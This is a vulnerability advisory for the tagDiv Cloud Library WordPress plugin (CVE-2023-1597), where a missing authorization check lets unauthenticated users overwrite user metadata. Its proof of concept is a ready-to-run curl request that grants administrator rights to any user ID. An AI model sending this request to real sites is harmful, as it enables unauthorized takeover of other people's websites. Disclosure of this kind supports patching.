WordPress Plugin Vulnerabilities

tagDiv Cloud Library < 2.7 - Unauthenticated Arbitrary User Metadata Update to Privilege Escalation

Description

The plugin does not have authorisation and CSRF in an AJAX action accessible to both unauthenticated and authenticated users, allowing unauthenticated users to change arbitrary user metadata, which could lead to privilege escalation by setting themselves as an admin of the blog.

Proof of Concept

To set the user with ID 5 to an administrator:

curl -X POST --data 'action=tdb_user_form_on_submit&userID=5&formElements={"content-fields":[{"name":"wp_capabilities","value":{"administrator":true}}]}' https://example.com/wp-admin/admin-ajax.php

Affects Plugins

Plugin icon
td-cloud-library
Fixed in 2.7

References

CVE
CVE-2023-1597

Classification

Type
PRIVESC
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-269
CVSS
9.9 (critical)

Miscellaneous

Original Researcher
Truoc Phan
Submitter
Truoc Phan
Submitter website
https://www.facebook.com/292706121240740
Submitter twitter
truocphan
Verified
Yes
WPVDB ID
4eafe111-8874-4560-83ff-394abe7a803b

Timeline

Publicly Published
2023-06-19 (about 1 years ago)
Added
2023-06-19 (about 1 years ago)
Last Updated
2023-06-19 (about 1 years ago)

Other

Published
Title
Published
2023-04-06
Title
WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
Published
2019-08-23
Title
Bold Page Builder < 2.3.2 - Missing Access Controls
Published
2023-05-02
Title
Easy Digital Downloads < 3.1.1.4.2 - Unauthenticated Privilege Escalation
Published
2020-05-13
Title
Site Kit by Google < 1.8.0 - Privilege Escalation to gain Search Console Access
Published
2019-08-09
Title
ND Restaurant Reservations < 1.5 - Unauthenticated Options Change